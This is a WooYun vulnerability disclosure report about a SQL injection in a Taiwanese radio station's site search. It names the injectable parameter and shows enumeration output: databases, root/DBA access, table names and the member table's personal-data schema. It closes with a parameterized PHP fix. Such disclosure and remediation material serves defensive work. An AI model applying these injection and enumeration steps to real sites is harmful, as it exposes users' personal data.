
Vulnerability Summary

Defect ID: wooyun-2015-0166016

Title: 佳音廣播電台 (Taipei FM90.9) www main site: one SQL injection exposes 85 tables, DBA privileges and 20,000+ user records (username, password, name, sex, birthday, address, phone, email, etc.) (Taiwan)

Vendor: 佳音廣播電台

Author: 路人甲

Submitted: 2015-12-30 18:12

Fixed: 2016-02-12 18:49

Published: 2016-02-12 18:49

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed to a third-party partner (Hitcon, the Taiwan internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-12-30: Details sent to the vendor, awaiting vendor handling
2015-12-31: Vendor confirmed; details visible to the vendor only
2016-01-10: Details disclosed to core white hats and experts in the relevant field
2016-01-20: Details disclosed to regular white hats
2016-01-30: Details disclosed to intern white hats
2016-02-12: Details disclosed to the public

Brief description:

See title.

Detailed description:

Main site:

http://**.**.**.**/


Live stream:

http://**.**.**.**/live_goodnews_new.htm


Listening to it feels like Lin Chi-ling (志玲姐姐) is talking... so soft...
Vulnerable URL:

http://**.**.**.**/search.php
POST:keyword=1&submit=%E9%80%81%E5%87%BA
Parameter: keyword


(screenshot: SQL-1.png)


Ran it through a tool:

(screenshot: SQL-2.png)


5 databases:

available databases [5]:
[*] choir
[*] goodnews
[*] information_schema
[*] mysql
[*] test


Current database info:

(screenshot: SQL-3.png)


current user:    'root@localhost'
current database: 'goodnews'
current user is DBA: True


85 tables:

(screenshot: SQL-5.png)

Database: goodnews
[85 tables]
+--------------------------+
| admins |
| admins_log |
| areacode |
| banner |
| banner_type |
| broadcast |
| broadcast_log |
| common_label |
| content |
| content_group |
| content_group_hex |
| content_keyword |
| content_log_action |
| content_log_factory |
| content_log_library |
| content_log_message |
| content_log_music |
| content_log_musicnews |
| content_log_news |
| content_log_program |
| content_log_publish |
| content_log_song |
| content_log_story |
| content_log_website |
| content_top |
| content_type_action |
| content_type_common |
| content_type_factory |
| content_type_host |
| content_type_magazine |
| content_type_message |
| content_type_music |
| content_type_news |
| content_type_program |
| content_type_promotion |
| content_type_publish |
| content_type_story |
| content_type_website |
| epaper |
| epaper_order |
| epaper_queue |
| epaper_type |
| faqs |
| faqs_type |
| forum |
| forum_group |
| forum_group_type |
| forum_post |
| forum_post_type |
| forum_reply |
| forum_vote |
| host |
| host_log |
| library_member |
| library_member_log |
| library_music |
| library_music_borrow |
| library_music_borrow_log |
| library_music_expand_log |
| library_music_log |
| library_music_song |
| library_music_type |
| live |
| marquee |
| marquee_log |
| marquee_type |
| member |
| member_country |
| member_education |
| member_identity |
| member_interest |
| member_log |
| member_notice |
| member_question |
| member_religion |
| member_response |
| member_type |
| menu_group |
| repost_type |
| security_images |
| website |
| website_counter |
| website_log_ccm |
| website_log_classic |
| website_type |
+--------------------------+


22516 user records:

(screenshot: SQL-4.png)


The member table has 75 columns:

Database: goodnews
Table: member
[75 columns]
+--------------------------------+--------------+
| Column | Type |
+--------------------------------+--------------+
| id | int(10) |
| member_account | varchar(25) |
| member_action_notice | int(5) |
| member_address | varchar(250) |
| member_admin | varchar(120) |
| member_admin_update | datetime |
| member_answer | varchar(120) |
| member_areacode | varchar(25) |
| member_birthday | varchar(25) |
| member_birthday_month | varchar(5) |
| member_counter | int(10) |
| member_country | int(5) |
| member_education | int(5) |
| member_email | varchar(120) |
| member_emailchk | int(1) |
| member_epaper | int(1) |
| member_fax | varchar(120) |
| member_flag | int(5) |
| member_id | varchar(120) |
| member_identity | int(5) |
| member_interest | int(5) |
| member_level | varchar(25) |
| member_manage_title | varchar(120) |
| member_memo | text |
| member_mobeil | varchar(120) |
| member_mobeil_country_areacode | varchar(120) |
| member_nickname | varchar(120) |
| member_note | text |
| member_order_counter | int(10) |
| member_order_update | datetime |
| member_password | varchar(25) |
| member_pincode | varchar(25) |
| member_publish_order_magazine | int(5) |
| member_publish_order_paper | int(5) |
| member_question | varchar(25) |
| member_reg_date | datetime |
| member_reg_ip | varchar(120) |
| member_religion | int(5) |
| member_report_01 | int(5) |
| member_send_address | varchar(250) |
| member_send_areacode | varchar(25) |
| member_sex | int(1) |
| member_sign | varchar(250) |
| member_status | int(1) |
| member_tel | varchar(120) |
| member_tel_areacode | varchar(120) |
| member_tel_country_areacode | varchar(120) |
| member_title | varchar(120) |
| member_type_01 | int(5) |
| member_type_02 | int(5) |
| member_type_03 | int(5) |
| member_type_04 | int(5) |
| member_type_05 | int(5) |
| member_type_06 | int(5) |
| member_type_07 | int(5) |
| member_type_08 | int(5) |
| member_type_09 | int(5) |
| member_type_10 | int(5) |
| member_type_11 | int(5) |
| member_type_12 | int(5) |
| member_type_13 | int(5) |
| member_type_14 | int(5) |
| member_type_kind | int(10) |
| member_unit | varchar(250) |
| member_unit_ext | varchar(25) |
| member_unit_no | varchar(120) |
| member_unit_no_title | varchar(120) |
| member_unit_tel | varchar(120) |
| member_update | datetime |
| members_birthday_month | varchar(5) |
| members_equip | varchar(200) |
| members_face | varchar(100) |
| members_face_height | int(4) |
| members_face_width | int(4) |
| members_useravatar | varchar(10) |
+--------------------------------+--------------+


Dumped a few rows as proof:

(screenshot: SQL-6.png)


Tidied up:

(screenshot: SQL-7.png)

(screenshot: SQL-8.png)


DBA privileges allow cross-database access.

Proof of vulnerability:

Proven.

Fix recommendation:

Filter input.
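As an added illustration of that recommendation (this is example code, not the station's own search.php), the block below places the injectable pattern the report implies, a keyword concatenated straight into SQL, next to a parameterized replacement using PDO. It also connects with a dedicated read-only account instead of root, since the report's `current user is DBA: True` finding is what turned one injectable parameter into access to every database on the server. The table and column names (`content`, `content_title`), the account `search_ro` and its environment variable are assumptions for illustration; only the database name `goodnews` comes from the report.

```php
<?php
declare(strict_types=1);

// Added example, not the site's own code. Table/column names (content,
// content_title) and the search_ro account are assumptions; the database
// name goodnews is taken from the report.

// Connect with a least-privilege account. The report shows the application
// running as root@localhost with DBA rights; a search handler only needs
// SELECT on the table it searches.
function connect(): PDO
{
    $dsn = 'mysql:host=127.0.0.1;dbname=goodnews;charset=utf8mb4';
    return new PDO($dsn, 'search_ro', getenv('SEARCH_RO_PASSWORD') ?: '', [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES   => false, // real server-side prepared statements
        PDO::ATTR_DEFAULT_FETCH_MODE => PDO::FETCH_ASSOC,
    ]);
}

// BEFORE: the keyword is spliced into the query text, so whatever it contains
// is parsed as SQL. A character denylist ("filtering") is not a reliable fix;
// the query structure has to be kept out of the input's reach entirely.
function searchVulnerable(PDO $db, string $keyword): array
{
    $sql = "SELECT id, content_title FROM content WHERE content_title LIKE '%$keyword%'";
    return $db->query($sql)->fetchAll();
}

// AFTER: the keyword is bound as a parameter. The server compiles the statement
// before it sees the value, so the value can never change the query's shape.
// LIKE wildcards inside the input are escaped so '%' and '_' match literally
// (MySQL's default LIKE escape character is the backslash), the input is
// length-capped and the result set is bounded.
function searchSafe(PDO $db, string $keyword): array
{
    $keyword = mb_substr(trim($keyword), 0, 100);
    if ($keyword === '') {
        return [];
    }
    $pattern = '%' . addcslashes($keyword, '%_\\') . '%';

    $stmt = $db->prepare(
        'SELECT id, content_title FROM content WHERE content_title LIKE :kw LIMIT 50'
    );
    $stmt->bindValue(':kw', $pattern, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll();
}

// Handler shaped like the reported entry point: POST /search.php with keyword=...
if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $db = connect();
    $rows = searchSafe($db, (string)($_POST['keyword'] ?? ''));
    header('Content-Type: application/json; charset=utf-8');
    echo json_encode($rows, JSON_UNESCAPED_UNICODE);
}
```

The account the safe handler uses would be created with nothing beyond `GRANT SELECT ON goodnews.content TO 'search_ro'@'localhost'`, so that even a future injection elsewhere in the application could not reach the `member` table, let alone the `mysql` database or the other schemas listed in the report. Disabling `PDO::ATTR_EMULATE_PREPARES` matters: with emulation on, PDO still quotes the value client-side, which is generally safe, but true server-side prepared statements remove the client-side quoting step from the trust boundary altogether.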

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 17

Confirmed: 2015-12-31 03:34

Vendor reply:

Thanks for the report.

Latest status:

None yet